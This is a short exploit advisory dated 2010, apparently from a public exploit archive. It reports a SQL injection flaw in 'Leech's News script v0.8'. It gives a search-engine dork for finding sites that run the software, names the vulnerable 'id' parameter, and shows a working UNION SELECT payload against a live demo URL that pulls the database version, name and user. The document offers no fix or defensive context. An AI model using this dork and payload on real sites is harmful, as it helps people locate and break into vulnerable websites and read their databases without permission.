Leech's News script v0.8 SQL Injection Vulnerability

===
# Leech's News script v0.8 SQL Injection Vulnerability
===
###########
# Name: Leech's News script v0.8 SQL Injection Vulnerability
# Vendor: http://rectalburger.com
# Date: 2010-07-20
# Author: XroGuE
# Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: (-_+)
###########
 
[+] Dork: intext:"Powered by Leech's News script v0.8"
 
###########
 
[+] SQL InjecTion Vulnerability:
 
[+] vuln: http://[site]/[path]/[index.php],[profile.php],...?id=[SQLi]
 
[+] Demo: http://rectalburger.com/profile.php?id=-999%20UNION%20SELECT%201,version%28%29,3,4,5,6,database%28%29,user%28%29,9,10,11,12--
 
###########